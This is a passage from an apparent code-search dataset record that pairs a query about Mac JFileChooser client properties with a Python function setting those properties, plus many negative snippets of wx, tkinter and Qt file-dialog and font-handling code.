available_text_fonts():\n bad = [u'acalc',\n u'acb',\n u'aco',\n u'acp']\n all = available_fonts()\n fonts = []\n for f in all:\n if (f == u'Series 60 ZDigi'):\n continue\n for b in bad:\n try:\n if (f.lower().startswith(b) and f[len(b)].isdigit()):\n break\n except IndexError:\n pass\n else:\n fonts.append(f)\n\n\n\n def compare(a, b):\n return -(a.lower() < b.lower())\n\n\n fonts.sort(compare)\n return fonts", "def set_font(self, font='A'):\n upper = font.upper()\n if upper == 'B':\n self._set_print_mode(self.FONT_MASK)\n elif upper == 'A':\n self._unset_print_mode(self.FONT_MASK)\n else:\n self._unset_print_mode(self.FONT_MASK)", "def default_plt_options():\n params = {'mathtext.default': 'regular',\n 'font.family': 'serif', 'text.usetex': False}\n plt.rcParams.update(params)", "def set_font_size(window, size):\n\n font = window.GetFont()\n\n clone = clone_font(font)\n clone.SetPointSize(size)\n\n window.SetFont(clone)\n\n sizer = window.GetSizer()\n if sizer is not None:\n sizer.Layout()\n \n window.Refresh()\n\n for child in window.GetChildren():\n set_font_size(child, size)\n \n return", "def scale_name(self):\n if len(self.name) > 8:\n self.name = self.name[:8]\n self.name_font = pygame.font.SysFont(\"Times\", 20)\n\n if len(self.opp_name) <= 8:\n self.opp_name_font = pygame.font.SysFont(\"Times\", 20)\n else:\n self.opp_name_font = pygame.font.SysFont(\"Times\", 15)\n return", "def get_font_dict(f):\n return tk_font.Font(font=f).actual()" ]
[ "0.68280387", "0.6737032", "0.6695929", "0.6610507", "0.64827216", "0.6389932", "0.6196747", "0.6126894", "0.60420203", "0.60152656", "0.59716773", "0.596298", "0.593417", "0.5910025", "0.5883346", "0.58664095", "0.58539915", "0.5838941", "0.58219564", "0.58039767", "0.578717", "0.575832", "0.57524735", "0.5694457", "0.5687482", "0.56561804", "0.5655132", "0.5655132", "0.564786", "0.56450135", "0.56177676", "0.56016916", "0.5601545", "0.5575735", "0.5563804", "0.55414814", "0.5490364", "0.5487726", "0.54841447", "0.5465644", "0.54559374", "0.54439014", "0.5438704", "0.5429805", "0.5422846", "0.54116106", "0.54103017", "0.54029137", "0.5389722", "0.53758717", "0.5365248", "0.535637", "0.5352313", "0.5352135", "0.5332061", "0.5329785", "0.5317767", "0.52936834", "0.52788126", "0.5265701", "0.5251513", "0.52428555", "0.52325845", "0.52180004", "0.5217646", "0.5212647", "0.5212647", "0.5212647", "0.52124906", "0.5209657", "0.5208829", "0.5198707", "0.51895344", "0.51862675", "0.5180124", "0.5174668", "0.51719785", "0.51693535", "0.5166607", "0.5157251", "0.51498425", "0.5147061", "0.5145401", "0.51434994", "0.5140011", "0.5137312", "0.5136769", "0.51297134", "0.5126503", "0.5118875", "0.51155716", "0.51100934", "0.5109338", "0.510912", "0.5105606", "0.51046795", "0.5101809", "0.5097481", "0.5089087", "0.50757" ]
0.829493
0
sets up Client Properties for JFileChooser() to behave as required >> Mac only
def setJFileChooserParameters(_jf, lReportOnly=False, lDefaults=False, lPackagesT=None, lApplicationsT=None, lOptionsButton=None, lNewFolderButton=None): myPrint("D", "In ", inspect.currentframe().f_code.co_name, "()") if not Platform.isOSX(): return if not isinstance(_jf, JFileChooser): return _PKG = "JFileChooser.packageIsTraversable" _APP = "JFileChooser.appBundleIsTraversable" _OPTIONS = "JFileChooser.optionsPanelEnabled" _NEWFOLDER = "JFileChooser.canCreateDirectories" # JFileChooser defaults: https://violetlib.org/vaqua/filechooser.html # "JFileChooser.packageIsTraversable" default False >> set "true" to allow Packages to be traversed # "JFileChooser.appBundleIsTraversable" default False >> set "true" to allow App Bundles to be traversed # "JFileChooser.optionsPanelEnabled" default False >> set "true" to allow Options button # "JFileChooser.canCreateDirectories" default False >> set "true" to allow New Folder button if debug or lReportOnly: myPrint("B", "Parameters set: ReportOnly: %s, Defaults:%s, PackagesT: %s, ApplicationsT:%s, OptionButton:%s, NewFolderButton: %s" %(lReportOnly, lDefaults, lPackagesT, lApplicationsT, lOptionsButton, lNewFolderButton)) txt = ("Before setting" if not lReportOnly else "Reporting only") for setting in [_PKG, _APP, _OPTIONS, _NEWFOLDER]: myPrint("DB", "%s: '%s': '%s'" %(pad(txt,14), pad(setting,50), _jf.getClientProperty(setting))) if lReportOnly: return if lDefaults: _jf.putClientProperty(_PKG, None) _jf.putClientProperty(_APP, None) _jf.putClientProperty(_OPTIONS, None) _jf.putClientProperty(_NEWFOLDER, None) else: if lPackagesT is not None: _jf.putClientProperty(_PKG, lPackagesT) if lApplicationsT is not None: _jf.putClientProperty(_APP, lApplicationsT) if lOptionsButton is not None: _jf.putClientProperty(_OPTIONS, lOptionsButton) if lNewFolderButton is not None: _jf.putClientProperty(_NEWFOLDER, lNewFolderButton) for setting in [_PKG, _APP, _OPTIONS, _NEWFOLDER]: myPrint("DB", "%s: '%s': '%s'" %(pad("After setting",14), pad(setting,50), _jf.getClientProperty(setting))) return
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def setFileDialogParameters(lReportOnly=False, lDefaults=False, lSelectDirectories=None, lPackagesT=None):\n\n myPrint(\"D\", \"In \", inspect.currentframe().f_code.co_name, \"()\")\n\n if not Platform.isOSX(): return\n\n _TRUE = \"true\"\n _FALSE = \"false\"\n\n _DIRS_FD = \"apple.awt.fileDialogForDirectories\" # When True you can select a Folder (rather than a file)\n _PKGS_FD = \"apple.awt.use-file-dialog-packages\" # When True allows you to select a 'bundle' as a file; False means navigate inside the bundle\n # \"com.apple.macos.use-file-dialog-packages\" # DEPRECATED since Monterrey - discovered this about MD2022.5(4090) - refer: java.desktop/sun/lwawt/macosx/CFileDialog.java\n\n # FileDialog defaults\n # \"apple.awt.fileDialogForDirectories\" default \"false\" >> set \"true\" to allow Directories to be selected\n # \"apple.awt.use-file-dialog-packages\" default \"true\" >> set \"false\" to allow access to Mac 'packages'\n\n if debug or lReportOnly:\n myPrint(\"B\", \"Parameters set: ReportOnly: %s, Defaults:%s, SelectDirectories:%s, PackagesT:%s\" % (lReportOnly, lDefaults, lSelectDirectories, lPackagesT))\n txt = (\"Before setting\" if not lReportOnly else \"Reporting only\")\n for setting in [_DIRS_FD, _PKGS_FD]: myPrint(\"DB\", \"%s: '%s': '%s'\" %(pad(txt,14), pad(setting,50), System.getProperty(setting)))\n if lReportOnly: return\n\n if lDefaults:\n System.setProperty(_DIRS_FD,_FALSE)\n System.setProperty(_PKGS_FD,_TRUE)\n else:\n if lSelectDirectories is not None: System.setProperty(_DIRS_FD, (_TRUE if lSelectDirectories else _FALSE))\n if lPackagesT is not None: System.setProperty(_PKGS_FD, (_TRUE if lPackagesT else _FALSE))\n\n for setting in [_DIRS_FD, _PKGS_FD]: myPrint(\"DB\", \"After setting: '%s': '%s'\" %(pad(setting,50), System.getProperty(setting)))\n\n return", "def readInConfigFileDlg( self ):\n pass", "def askOpen(parent,title='',defaultDir='',defaultFile='',wildcard='',style=wx.OPEN):\r\n defaultDir,defaultFile = [GPath(x).s for x in (defaultDir,defaultFile)]\r\n dialog = wx.FileDialog(parent,title,defaultDir,defaultFile,wildcard, style )\r\n if dialog.ShowModal() != wx.ID_OK: \r\n result = False\r\n elif style & wx.MULTIPLE:\r\n result = map(GPath,dialog.GetPaths())\r\n else:\r\n result = GPath(dialog.GetPath())\r\n dialog.Destroy()\r\n return result", "def input_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._input_path_var.set(filename)", "def pkg_app_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._pkg_app_path_var.set(filename)", "def onLoad (self):\n #productive #onButton\n profprint()\n self.fileDialog = qt.QFileDialog(self.parent)\n self.fileDialog.setDirectory(slicer.modules.needlefinder.path.replace(\"NeedleFinder.py\",\"Config\"))\n self.fileDialog.options = self.fileDialog.DontUseNativeDialog\n self.fileDialog.acceptMode = self.fileDialog.AcceptOpen\n self.fileDialog.defaultSuffix = \"cfg\"\n self.fileDialog.setNameFilter(\"Configuration File (*.cfg)\")\n self.fileDialog.connect(\"fileSelected(QString)\", self.onLoadFileSelected)\n self.fileDialog.show()", "def __init__(self, parent):\n super(CookiesConfigurationDialog, self).__init__(parent)\n self.setupUi(self)\n \n self.__mw = parent\n \n jar = self.__mw.cookieJar()\n acceptPolicy = jar.acceptPolicy()\n if acceptPolicy == CookieJar.AcceptAlways:\n self.acceptCombo.setCurrentIndex(0)\n elif acceptPolicy == CookieJar.AcceptNever:\n self.acceptCombo.setCurrentIndex(1)\n elif acceptPolicy == CookieJar.AcceptOnlyFromSitesNavigatedTo:\n self.acceptCombo.setCurrentIndex(2)\n \n keepPolicy = jar.keepPolicy()\n if keepPolicy == CookieJar.KeepUntilExpire:\n self.keepUntilCombo.setCurrentIndex(0)\n elif keepPolicy == CookieJar.KeepUntilExit:\n self.keepUntilCombo.setCurrentIndex(1)\n \n self.filterTrackingCookiesCheckbox.setChecked(\n jar.filterTrackingCookies())\n \n msh = self.minimumSizeHint()\n self.resize(max(self.width(), msh.width()), msh.height())", "def __init__(self, parent=None):\n super(E5ComboPathPicker, self).__init__(parent, useLineEdit=False)", "def onLoad (self):\r\n # productive #onButton\r\n profprint()\r\n self.dirDialog = qt.QFileDialog(self.parent)\r\n self.dirDialog.setDirectory(slicer.modules.needlefinder.path.replace(\"NeedleFinder.py\", \"Config\"))\r\n self.dirDialog.options = self.dirDialog.DontUseNativeDialog\r\n self.dirDialog.acceptMode = self.dirDialog.AcceptOpen\r\n self.dirDialog.defaultSuffix = \"cfg\"\r\n self.dirDialog.setNameFilter(\"Configuration File (*.cfg)\")\r\n self.dirDialog.connect(\"fileSelected(QString)\", self.onLoadFileSelected)\r\n self.dirDialog.show()", "def __showPathPickerDialog(self):\n if self.__mode == E5PathPickerModes.NoMode:\n return\n \n if self.__mode == E5PathPickerModes.CustomMode:\n self.pickerButtonClicked.emit()\n return\n \n self.aboutToShowPathPickerDialog.emit()\n \n windowTitle = self.__windowTitle\n if not windowTitle:\n if self.__mode == E5PathPickerModes.OpenFileMode:\n windowTitle = self.tr(\"Choose a file to open\")\n elif self.__mode == E5PathPickerModes.OpenFilesMode:\n windowTitle = self.tr(\"Choose files to open\")\n elif self.__mode in [\n E5PathPickerModes.SaveFileMode,\n E5PathPickerModes.SaveFileEnsureExtensionMode,\n E5PathPickerModes.SaveFileOverwriteMode]:\n windowTitle = self.tr(\"Choose a file to save\")\n elif self.__mode == E5PathPickerModes.DirectoryMode:\n windowTitle = self.tr(\"Choose a directory\")\n \n directory = self._editorText()\n if not directory and self.__defaultDirectory:\n directory = self.__defaultDirectory\n if self.__mode == E5PathPickerModes.OpenFilesMode:\n directory = os.path.expanduser(directory.split(\";\")[0])\n else:\n directory = os.path.expanduser(directory)\n if not os.path.isabs(directory) and self.__defaultDirectory:\n directory = os.path.join(self.__defaultDirectory, directory)\n directory = Utilities.fromNativeSeparators(directory)\n \n if self.__mode == E5PathPickerModes.OpenFileMode:\n path = E5FileDialog.getOpenFileName(\n self,\n windowTitle,\n directory,\n self.__filters)\n path = Utilities.toNativeSeparators(path)\n elif self.__mode == E5PathPickerModes.OpenFilesMode:\n paths = E5FileDialog.getOpenFileNames(\n self,\n windowTitle,\n directory,\n self.__filters)\n path = \";\".join([Utilities.toNativeSeparators(path)\n for path in paths])\n elif self.__mode == E5PathPickerModes.SaveFileMode:\n path = E5FileDialog.getSaveFileName(\n self,\n windowTitle,\n directory,\n self.__filters,\n E5FileDialog.Options(E5FileDialog.DontConfirmOverwrite))\n path = Utilities.toNativeSeparators(path)\n elif self.__mode == E5PathPickerModes.SaveFileEnsureExtensionMode:\n path, selectedFilter = E5FileDialog.getSaveFileNameAndFilter(\n self,\n windowTitle,\n directory,\n self.__filters,\n None,\n E5FileDialog.Options(E5FileDialog.DontConfirmOverwrite))\n path = Utilities.toNativeSeparators(path)\n if path:\n ext = QFileInfo(path).suffix()\n if not ext:\n ex = selectedFilter.split(\"(*\")[1].split(\")\")[0]\n if ex:\n path += ex\n elif self.__mode == E5PathPickerModes.SaveFileOverwriteMode:\n path = E5FileDialog.getSaveFileName(\n self,\n windowTitle,\n directory,\n self.__filters)\n path = Utilities.toNativeSeparators(path)\n elif self.__mode == E5PathPickerModes.DirectoryMode:\n path = E5FileDialog.getExistingDirectory(\n self,\n windowTitle,\n directory,\n E5FileDialog.Options(E5FileDialog.ShowDirsOnly))\n path = Utilities.toNativeSeparators(path)\n while path.endswith(os.sep):\n path = path[:-1]\n elif self.__mode == E5PathPickerModes.DirectoryShowFilesMode:\n path = E5FileDialog.getExistingDirectory(\n self,\n windowTitle,\n directory,\n E5FileDialog.Options(E5FileDialog.DontUseNativeDialog))\n path = Utilities.toNativeSeparators(path)\n while path.endswith(os.sep):\n path = path[:-1]\n \n if path:\n self._setEditorText(path)\n self.pathSelected.emit(path)", "def saveInConfigFileDlg( self ):\n pass", "def __init__(self, parent, state, position = wx.DefaultPosition):\n ##Set up data.\n self.state = state\n modeName = MODE_LIST[self.state.GetSurface(\"Mode\")]\n wx.Dialog.__init__(self, parent, -1, \"%s Mode Settings\" %(modeName),\n pos = position,\n style = wx.DEFAULT_FRAME_STYLE ^ (wx.RESIZE_BORDER | \n wx.MINIMIZE_BOX |\n wx.MAXIMIZE_BOX)\n | wx.TAB_TRAVERSAL)\n ##Jconf pull-down menu.\n \n self.lblStBox1 = wx.StaticBox(self, -1, \"Programs to launch\" )\n ##Name Server checkbox.\n self.cbNameServer = wx.CheckBox(self, -1, \"Name Server\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.cbNameServer.SetToolTip(wx.ToolTip(\"Run Name Server at Launch\"))\n ##Conductor checkbox.\n self.cbConductor = wx.CheckBox(self, -1, \"Conductor\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.cbConductor.SetToolTip(wx.ToolTip(\"Run Conductor at Launch\"))\n ##Xplorer checkbox.\n self.cbXplorer = wx.CheckBox(self, -1, \"Xplorer\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.cbXplorer.SetToolTip(wx.ToolTip(\"Run Xplorer at Launch\"))\n ##Desktop checkbox.\n self.cbDesktop = wx.CheckBox(self, -1, \"Desktop Mode\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.cbDesktop.SetToolTip(wx.ToolTip(\"Set Desktop Mode for\" +\n \" Conductor and Xplorer\"))\n \n self.lblStBox2 = wx.StaticBox(self, -1, \"Xplorer Configuration\" )\n ##Xplorer Type radio box.\n self.rbXplorer = wx.RadioBox(self, -1, \"Mode\",\n wx.DefaultPosition, wx.DefaultSize,\n RADIO_XPLORER_LIST, 1, wx.RA_SPECIFY_ROWS)\n self.rbXplorer.SetToolTip(wx.ToolTip(\"Which Xplorer format do you\" +\n \" want to launch?\"))\n ##Cluster button.\n self.bCluster = wx.Button(self, -1, \"Cluster Settings\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.bCluster.SetToolTip(wx.ToolTip(\"Set the computers and extra\" +\n \" variables in the cluster.\"))\n ##Configuration Choice\n self.chJconf = wx.Choice(self, -1, wx.DefaultPosition, [150,-1])\n self.chJconf.SetToolTip(wx.ToolTip(\"Choose Xplorer's configuration.\"))\n ##Edit Jconf button.\n self.bEditJconf = wx.Button(self, -1, \"Edit Configuration List\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.bEditJconf.SetToolTip(wx.ToolTip(\"Edit the list of Xplorer\" +\n \" configurations.\")) \n #OK and Cancel button\n if windows:\n self.bOk = wx.Button( self, wx.ID_OK, \"OK\", wx.DefaultPosition, wx.DefaultSize, 0 )\n else:\n self.bOk = wx.Button( self, wx.ID_SAVE, \"Save\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.bCancel = wx.Button( self, wx.ID_CANCEL, \"Cancel\", wx.DefaultPosition, wx.DefaultSize, 0 )\n \n ##Bind events.\n self.Bind(wx.EVT_LISTBOX, self.Refresh, self.chJconf)\n self.Bind(wx.EVT_CHECKBOX, self.Refresh, self.cbXplorer)\n self.Bind(wx.EVT_RADIOBOX, self.Refresh, self.rbXplorer)\n self.Bind(wx.EVT_CHECKBOX, self.Refresh, self.cbConductor)\n self.Bind(wx.EVT_CHECKBOX, self.Refresh, self.cbDesktop)\n \"\"\"\n self.Bind(wx.EVT_LISTBOX, self.UpdateData, self.chJconf)\n self.Bind(wx.EVT_CHECKBOX, self.UpdateData, self.cbXplorer)\n self.Bind(wx.EVT_RADIOBOX, self.UpdateData, self.rbXplorer)\n self.Bind(wx.EVT_CHECKBOX, self.UpdateData, self.cbConductor)\n self.Bind(wx.EVT_CHECKBOX, self.UpdateData, self.cbDesktop)\n \"\"\"\n self.Bind(wx.EVT_CLOSE, self.OnClose)\n if windows:\n self.Bind(wx.EVT_BUTTON, self.OnOk, id = wx.ID_OK)\n else:\n self.Bind(wx.EVT_BUTTON, self.OnOk, id = wx.ID_SAVE)\n self.Bind(wx.EVT_BUTTON, self.EditJconf, self.bEditJconf)\n self.Bind(wx.EVT_BUTTON, self.EditCluster, self.bCluster)\n \n ##Set sizers.\n vSizerMain = wx.BoxSizer( wx.VERTICAL )\n vSizer1 = wx.BoxSizer( wx.VERTICAL )\n svSizer1 = wx.StaticBoxSizer( self.lblStBox1, wx.VERTICAL )\n svSizer1.Add( self.cbNameServer, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5 )\n hSizer1 = wx.BoxSizer( wx.HORIZONTAL )\n hSizer1.Add( self.cbConductor, 0, wx.ALIGN_CENTER|wx.ALL, 5 )\n spacer1 = wx.StaticText(self, -1, \" \", wx.DefaultPosition, wx.DefaultSize, 0 )\n hSizer1.Add( spacer1, 0, wx.ALIGN_CENTER, 5 )\n hSizer1.Add( self.cbDesktop, 0, wx.ALIGN_CENTER|wx.ALL, 5 )\n svSizer1.Add( hSizer1, 0, wx.ALIGN_CENTER_VERTICAL, 5 )\n svSizer1.Add( self.cbXplorer, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5 )\n vSizer1.Add( svSizer1, 0, wx.GROW|wx.ALIGN_CENTER_VERTICAL|wx.TOP, 5 )\n spacer2 = wx.StaticText(self, -1, \"\", wx.DefaultPosition, [10,10], 0 )\n vSizer1.Add( spacer2, 0, wx.ALIGN_CENTER, 5 )\n svSizer2 = wx.StaticBoxSizer( self.lblStBox2, wx.VERTICAL )\n hSizer2 = wx.BoxSizer( wx.HORIZONTAL )\n hSizer2.Add( self.rbXplorer, 0, wx.ALIGN_CENTER|wx.ALL, 5 )\n hSizer2.Add( self.bCluster, 0, wx.ALIGN_CENTER|wx.LEFT|wx.RIGHT|wx.TOP, 5 )\n svSizer2.Add( hSizer2, 0, wx.ALIGN_CENTER_VERTICAL, 5 )\n hSizer3 = wx.BoxSizer( wx.HORIZONTAL )\n hSizer3.Add( self.chJconf, 0, wx.ALIGN_CENTER|wx.ALL, 5 )\n hSizer3.Add( self.bEditJconf, 0, wx.ALIGN_CENTER|wx.ALL, 5 )\n svSizer2.Add( hSizer3, 0, wx.ALIGN_CENTER, 5 )\n vSizer1.Add( svSizer2, 0, wx.GROW|wx.ALIGN_CENTER_VERTICAL, 5 )\n hSizer4 = wx.BoxSizer( wx.HORIZONTAL )\n if windows:\n hSizer4.Add( self.bOk, 0, wx.ALIGN_CENTER|wx.ALL, 5 ) \n hSizer4.Add( self.bCancel, 0, wx.ALIGN_CENTER|wx.LEFT|wx.TOP|wx.BOTTOM, 5 )\n else: \n hSizer4.Add( self.bCancel, 0, wx.ALIGN_CENTER|wx.ALL, 5 ) \n hSizer4.Add( self.bOk, 0, wx.ALIGN_CENTER|wx.LEFT|wx.TOP|wx.BOTTOM, 5 )\n vSizer1.Add( hSizer4, 0, wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL|wx.LEFT|wx.TOP, 5 )\n vSizerMain.Add( vSizer1, 0, wx.ALIGN_CENTER|wx.ALL, 5 ) \n \n vSizerMain.SetSizeHints(self)\n self.SetSizer(vSizerMain)\n #self.CenterOnParent(wx.BOTH)\n ##Set the background color.\n #Style(self)\n if not CLUSTER_ENABLED:\n self.bCluster.Hide()\n ##Set up OK button.\n ##Update Display\n self.React()", "def import_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._import_path_var.set(filename)", "def import_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._import_path_var.set(filename)", "def import_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._import_path_var.set(filename)", "def on_browse(self, event):\r\n wildcard = \"All files (*.*)|*.*\"\r\n with wx.FileDialog(None, \"Choose a file\",\r\n wildcard=wildcard,\r\n style=wx.ID_OPEN) as dialog:\r\n if dialog.ShowModal() == wx.ID_OK:\r\n self.grin_location.SetValue(dialog.GetPath())", "def import_file_chooser(self):\n filename = tk.filedialog.askopenfilenames()\n self._import_path_var.set(filename)", "def browse(self):\n\n self.filepath.set(fd.askopenfilename(initialdir=self._initaldir,\n filetypes=self._filetypes))", "def set_spec_file(self):\n self.specfile = select_file(os.getcwd())\n if self.specfile is not None:\n self.spec_file_button.setStyleSheet(\"Text-align:left\")\n self.spec_file_button.setText(self.specfile)\n else:\n self.specfile = None\n self.spec_file_button.setText('')\n if self.is_exp_exists() or self.is_exp_set():\n self.set_experiment()", "def initProperties(self):\n self.setFoldComments(Preferences.getEditor(\"CssFoldComment\"))\n self.setFoldCompact(Preferences.getEditor(\"AllFoldCompact\"))\n try:\n self.setHSSLanguage(\n Preferences.getEditor(\"CssHssSupport\"))\n self.setLessLanguage(\n Preferences.getEditor(\"CssLessSupport\"))\n self.setSCSSLanguage(\n Preferences.getEditor(\"CssSassySupport\"))\n except AttributeError:\n pass", "def AutomagicalSettings(self):\n # Try to find gclient or repo root first.\n if not self.options.no_search:\n self.toplevel_root = gclient_utils.FindGclientRoot(self.checkout_root)\n if self.toplevel_root:\n logging.info('Found .gclient at %s' % self.toplevel_root)\n else:\n self.toplevel_root = gclient_utils.FindFileUpwards(\n os.path.join('..', '.repo'), self.checkout_root)\n if self.toplevel_root:\n logging.info('Found .repo dir at %s'\n % os.path.dirname(self.toplevel_root))\n\n # Parse TRYSERVER_* settings from codereview.settings before falling back\n # on setting self.options.root manually further down. Otherwise\n # TRYSERVER_ROOT would never be used in codereview.settings.\n self._GclStyleSettings()\n\n if self.toplevel_root and not self.options.root:\n assert os.path.abspath(self.toplevel_root) == self.toplevel_root\n self.options.root = gclient_utils.PathDifference(self.toplevel_root,\n self.checkout_root)\n else:\n self._GclStyleSettings()", "def select_app():\n panel = Cocoa.NSOpenPanel.openPanel()\n panel.setCanChooseFiles_(True)\n panel.setCanChooseDirectories_(True)\n panel.setResolvesAliases_(True)\n\n if(panel.runModal() == Cocoa.NSOKButton):\n pathArray = panel.filenames()\n path = pathlib.Path(pathArray[0])\n\n plistPath = path /'Contents'/'Info.plist'\n infoFile = plistPath\n\n try:\n appSize = subprocess.check_output(['du', '-shg', str(path)]).split()[0].decode('utf-8')\n n.views['appSize'].setStringValue_(str(appSize))\n except Exception as err:\n print(err)\n\n n.views['appLocation'].setStringValue_(str(path))\n\n try:\n plist = str(infoFile)\n with open(plist, 'rb') as f:\n info = plistlib.load(f)\n\n if 'CFBundleName' in info:\n global collectedName\n collectedName = info['CFBundleName']\n n.views['appName'].setStringValue_(collectedName)\n else:\n n.views['appName'].setStringValue_('')\n\n if 'CFBundleShortVersionString' in info:\n global collectedVersion\n collectedVersion= info['CFBundleShortVersionString']\n n.views['appVersion'].setStringValue_(collectedVersion)\n else:\n n.views['appVersion'].setStringValue_('')\n\n if 'CFBundleIconFile' in info:\n global collectedIcon\n collectedIcon = pathlib.Path(plist).parent / 'Resources' / info['CFBundleIconFile']\n n.views['appIcon'].setStringValue_(str(collectedIcon))\n else:\n n.views['appIcon'].setStringValue_('')\n\n if 'CFBundleIdentifier' in info:\n global collectedIdentifier\n collectedIdentifier = info['CFBundleIdentifier']\n n.views['appIdentifier'].setStringValue_(collectedIdentifier)\n else:\n n.views['appIdentifier'].setStringValue_('')\n\n except Exception as err:\n print('An Error Occured: {0}'.format(err))", "def FileDialog( message, wildcard, style, defaultDir=os.getcwd(), defaultFile='' ):\n dlg = wx.FileDialog( wx.GetApp().GetTopWindow(), message, defaultDir, defaultFile, wildcard, style )\n if dlg.ShowModal() == wx.ID_OK:\n if style & wx.MULTIPLE:\n result = dlg.GetPaths()\n else:\n result = dlg.GetPath()\n else:\n result = False\n dlg.Destroy()\n \n return result", "def __init__(\n self,\n title:str=\"Universal File Dialog\",\n icon:str=\"\",\n show_hidden:bool=False,\n include_files:bool=True,\n multiselect:bool=True,\n select_dirs:bool=True,\n select_files:bool=True,\n unix_delimiter:bool=True,\n stdout:bool=False\n ):\n\n if not isinstance(title, str):\n raise TypeError(\"Argument title must be type string.\")\n\n self.title = title\n\n if icon:\n if not isinstance(icon, str):\n raise TypeError(\"Argument icon must be type string.\")\n\n if not isfile(icon):\n raise FileNotFoundError(f\"File not found: {icon}\")\n\n self.icon = icon\n\n else: \n self.icon = \"\"\n\n if show_hidden:\n self.show_hidden = True\n else:\n self.show_hidden = False\n\n if include_files:\n self.include_files = True\n else:\n self.include_files = False\n\n if multiselect:\n self.multiselect = True\n else:\n self.multiselect = False\n\n if select_dirs:\n self.select_dirs = True\n else:\n self.select_dirs = False\n\n if select_files:\n self.select_files = True\n else:\n self.select_files = False\n\n if unix_delimiter:\n self.unix_delimiter = True\n else:\n self.unix_delimiter = False\n\n if stdout:\n self.stdout = True\n else:\n self.stdout = False\n\n # Tkinter:\n self.dialog = Tk()\n self.dialog.withdraw()\n self.dialog.title(self.title)\n self.dialog.minsize(width=300, height=200)\n self.dialog.geometry(\"500x300\")\n self.dialog.update_idletasks()\n\n self.file_icon=PhotoImage(\n file=f\"{dirname(__file__)}/file.gif\",\n master=self.dialog\n ).subsample(50)\n\n self.folder_icon=PhotoImage(\n file=f\"{dirname(__file__)}/folder.gif\",\n master=self.dialog\n ).subsample(15)\n \n self.disk_icon=PhotoImage(\n file=f\"{dirname(__file__)}/disk.gif\",\n master=self.dialog\n ).subsample(15)\n\n if self.icon:\n self.dialog.iconbitmap(self.icon)\n else:\n self.dialog.iconbitmap(f\"{dirname(__file__)}/icon.ico\")\n \n # Widgets:\n self.paneview = PanedWindow(\n self.dialog,\n sashwidth=7,\n bg=\"#cccccc\",\n bd=0,\n )\n\n self.left_pane = PanedWindow(self.paneview)\n self.right_pane = PanedWindow(self.paneview)\n self.paneview.add(self.left_pane)\n self.paneview.add(self.right_pane)\n\n self.treeview_x_scrollbar=Scrollbar(self.left_pane, orient=\"horizontal\")\n self.treeview_y_scrollbar=Scrollbar(self.left_pane, orient=\"vertical\")\n self.list_box_x_scrollbar=Scrollbar(self.right_pane, orient=\"horizontal\")\n self.list_box_y_scrollbar=Scrollbar(self.right_pane, orient=\"vertical\")\n \n # tstyle = Style().configure(\".\", )\n\n self.treeview=Treeview(\n self.left_pane,\n xscrollcommand=self.treeview_x_scrollbar.set,\n yscrollcommand=self.treeview_y_scrollbar.set,\n show=\"tree\",\n selectmode=\"browse\",\n # style=tstyle\n )\n\n\n self.list_box=Listbox(\n self.right_pane,\n xscrollcommand=self.list_box_x_scrollbar.set,\n yscrollcommand=self.list_box_y_scrollbar.set,\n width=34,\n highlightthickness=0,\n bd=2,\n relief=\"ridge\"\n )\n\n if self.multiselect:\n self.list_box.config(selectmode=\"extended\")\n else:\n self.list_box.config(selectmode=\"browse\")\n\n self.cancel_button = Button(\n self.left_pane,\n text=\"Cancel\",\n command=self.cancel\n )\n\n self.submit_button = Button(\n self.right_pane,\n text=\"Submit\",\n command=self.submit\n )\n\n self.treeview_x_scrollbar.config(command=self.treeview.xview)\n self.treeview_y_scrollbar.config(command=self.treeview.yview)\n self.list_box_x_scrollbar.config(command=self.list_box.xview)\n self.list_box_y_scrollbar.config(command=self.list_box.yview)\n \n #Layout:\n self.dialog.rowconfigure(0, weight=1)\n self.dialog.columnconfigure(0, weight=1)\n\n self.left_pane.grid_rowconfigure(0, weight=1)\n self.left_pane.grid_columnconfigure(0, weight=1)\n self.right_pane.grid_rowconfigure(0, weight=1)\n self.right_pane.grid_columnconfigure(0, weight=1)\n\n self.paneview.paneconfigure(\n self.left_pane,\n minsize=100,\n #Start off w/ the sash centered in the GUI:\n width=(self.dialog.winfo_width() / 2) - \n ceil((self.paneview.cget(\"sashwidth\") * 1.5)),\n )\n self.paneview.paneconfigure(self.right_pane, minsize=100)\n\n self.paneview.grid(\n row=0,\n column=0,\n sticky=\"nsew\"\n )\n\n self.treeview.grid(\n row=0,\n column=0,\n sticky=\"nsew\"\n )\n self.treeview_y_scrollbar.grid(\n row=0,\n column=1,\n sticky=\"ns\"\n )\n self.treeview_x_scrollbar.grid(\n row=1,\n column=0,\n columnspan=2,\n sticky=\"ew\"\n )\n\n self.list_box.grid(\n row=0,\n column=0,\n sticky=\"nsew\"\n )\n self.list_box_y_scrollbar.grid(\n row=0,\n column=1,\n sticky=\"ns\"\n )\n self.list_box_x_scrollbar.grid(\n row=1,\n column=0,\n columnspan=2,\n sticky=\"ew\"\n )\n\n self.cancel_button.grid(\n row=2,\n column=0,\n sticky=\"w\",\n padx=10, \n pady=10\n )\n self.submit_button.grid(\n row=2,\n column=0,\n columnspan=2,\n sticky=\"e\",\n padx=10,\n pady=10\n )\n \n #Bindings, Protocols, & Misc:\n self.dialog.bind(\"<Control-w>\", self.cancel)\n self.treeview.bind(\"<<TreeviewSelect>>\", self.treeview_select)\n self.treeview.bind(\"<Double-Button-1>\", self.dialog_populate)\n self.treeview.bind(\"<Return>\", self.dialog_populate)\n self.treeview.bind(\"<Right>\", self.dialog_populate)\n self.list_box.bind(\"<<ListboxSelect>>\", self.list_box_select)\n self.list_box.bind(\"<Return>\", self.submit)\n self.dialog.protocol(\"WM_DELETE_WINDOW\", 